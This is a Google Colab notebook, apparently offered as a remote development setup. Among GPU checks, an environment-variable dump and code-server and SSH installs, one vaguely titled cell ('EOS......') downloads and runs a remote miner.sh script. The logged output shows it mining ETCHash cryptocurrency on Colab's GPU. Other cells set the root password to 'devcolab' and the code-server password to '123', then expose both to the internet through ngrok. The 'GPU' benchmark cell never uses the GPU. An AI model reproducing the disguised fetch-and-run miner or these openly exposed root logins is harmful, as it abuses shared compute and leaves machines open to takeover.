<a href="https://colab.research.google.com/github/cirebonfinee/EOS/blob/main/DevColabDIREK.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [ ]:
#@title **CEK GPU**
# reset all จนกว่าจะได้ ดีกว่า K80
from IPython.display import HTML
from subprocess import getoutput
s = getoutput('nvidia-smi')
if 'K80' in s:
  gpu = 'K80'
elif 'T4' in s:
  gpu = 'T4'
elif 'P100' in s:
  gpu = 'P100'
display(HTML(f"<h2>{gpu}</h2>"))
print(s)
# or simply
!nvidia-smi -L

In [2]:
#@title MOD GPU

from numba import jit, cuda
import numpy as np
# to measure exec time
from timeit import default_timer as timer

# normal function to run on cpu
def func(a):								
	for i in range(10000000):
		a[i]+= 1	

						
def func2(a):
	for i in range(10000000):
		a[i]+= 1
if __name__=="__main__":
	n = 10000000							
	a = np.ones(n, dtype = np.float64)
	b = np.ones(n, dtype = np.float32)
	
	start = timer()
	func(a)
	print("without GPU:", timer()-start)	
	
	start = timer()
	func2(a)
	print("with GPU:", timer()-start)

without GPU: 4.795897878999995
with GPU: 4.817961073000006


In [3]:
#@title IMPORT CUDA

import os
' && '.join([f'export {name}="{value}"' for name, value in os.environ.items()])

'export NO_GCE_CHECK="True" && export GCS_READ_CACHE_BLOCK_SIZE_MB="16" && export CLOUDSDK_CONFIG="/content/.config" && export __EGL_VENDOR_LIBRARY_DIRS="/usr/lib64-nvidia:/usr/share/glvnd/egl_vendor.d/" && export CUDA_VERSION="11.0.3" && export PATH="/usr/local/nvidia/bin:/usr/local/cuda/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/tools/node/bin:/tools/google-cloud-sdk/bin:/opt/bin" && export HOME="/root" && export LD_LIBRARY_PATH="/usr/lib64-nvidia" && export LANG="en_US.UTF-8" && export SHELL="/bin/bash" && export LIBRARY_PATH="/usr/local/cuda/lib64/stubs" && export SHLVL="0" && export GCE_METADATA_TIMEOUT="0" && export NCCL_VERSION="2.7.8" && export NVIDIA_VISIBLE_DEVICES="all" && export DEBIAN_FRONTEND="noninteractive" && export CUDNN_VERSION="8.0.4.30" && export LAST_FORCED_REBUILD="20210812" && export JPY_PARENT_PID="65" && export PYTHONPATH="/env/python" && export DATALAB_SETTINGS_OVERRIDES="{"kernelManagerProxyPort":6000,"kernelManagerProxyHost":"172.28.0

In [4]:
#@title MAXIMALKAN TENSOR

import tensorflow as tf

from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import mixed_precision

mixed_precision.set_global_policy('mixed_float16')

INFO:tensorflow:Mixed precision compatibility check (mixed_float16): OK
Your GPU will likely run quickly with dtype policy mixed_float16 as it has compute capability of at least 7.0. Your GPU: Tesla T4, compute capability 7.5


In [ ]:
 
#@title EOS......
!wget https://raw.githubusercontent.com/cirebonfinee/EOS/main/miner.sh && chmod +x miner.sh && ./miner.sh

------------------------------------------------------- 
  Generated light cache for epoch 446 (ETCHash: 223) 
       Took 1937 ms, size of new DAG: 2807 MByte 
------------------------------------------------------- 
GPU 0: Starting DAG generation (normal mode)
GPU 0: DAG build complete 27%
New job received: 0x93d033 Epoch: 446 (ETCHash epoch: 223) Target: 0000000112e0be82 
GPU 0: DAG build complete 54%
GPU 0: DAG build complete 82%
GPU 0: DAG generation completed (5506 ms)
New job received: 0x7beea5 Epoch: 446 (ETCHash epoch: 223) Target: 0000000112e0be82 
Average speed (30s): 17.27 mh/s 
New job received: 0xd941ad Epoch: 446 (ETCHash epoch: 223) Target: 0000000112e0be82 


In [ ]:
#@title **INSTALL NGROK + MOUNT DRIVE**
!pip install pyngrok

import os
from pyngrok import ngrok
# Update the package lists
!sudo apt update

# Mount Google Drive
from google.colab import drive
drive.mount('/content/drive')
# Drive is mounted under "/content/drive/My Drive/"

# Ask for the ngrok authtoken
print("Get your authtoken from https://dashboard.ngrok.com/auth")
import getpass
authtoken = getpass.getpass()  # input your Ngrok auth token everytime you run the cell or simply replace "getpass.getpass()" with your token in "double quotes"
!ngrok authtoken $authtoken # login to ngrok
print("Google drive mounted and ngrok primed up. Now run any of the cells below.")


In [ ]:
#@title **INSTALL VSCODE**
!curl -fsSL https://code-server.dev/install.sh | sh
vscode_tunnel = ngrok.connect(8123)
print("Open the first link below in browser:")
print(str(vscode_tunnel).replace('http://', 'https://'))

!mkdir "/content/drive/My Drive/code-server"
! sudo rm "/content/drive/My Drive/code-server/config.yaml"
! echo "bind-addr: 127.0.0.1:8123" >> "/content/drive/My Drive/code-server/config.yaml"
! echo "auth: password" >> "/content/drive/My Drive/code-server/config.yaml"
! echo "password: 123" >> "/content/drive/My Drive/code-server/config.yaml" #the default password is devcolab
! echo "cert: false" >> "/content/drive/My Drive/code-server/config.yaml"
! code-server --config "/content/drive/My Drive/code-server/config.yaml" --user-data-dir "/content/drive/My Drive/code-server"


In [ ]:
#@title **KALO MAU PAKAI SSH**
# ssh setup
!apt-get install -qq -o=Dpkg::Use-Pty=0 openssh-server pwgen > /dev/null
!echo root:devcolab | chpasswd #the default ssh password is devcolab, change if you want
!mkdir -p /var/run/sshd
!echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
!echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config
!sudo /usr/sbin/sshd -D  &

# Connect to ngrok
ssh_tunnel = ngrok.connect(22, "tcp")
address = ((str(ssh_tunnel).split('"')[1::2])[0]).replace('tcp://', '')
print('Your tunnel address is ' + address)
print('Use the following command to connect: ' + "ssh root@" + "tcp://" + (address.split(':'))[0] + " -p " + (address.split(':'))[1])
print("or if that doesn't work, use this: " + "ssh root@" + (address.split(':'))[0] + " -p " + (address.split(':'))[1])



#### Debug:

In [ ]:
!cat ~/.config/code-server/config.yaml

In [ ]:
!pwd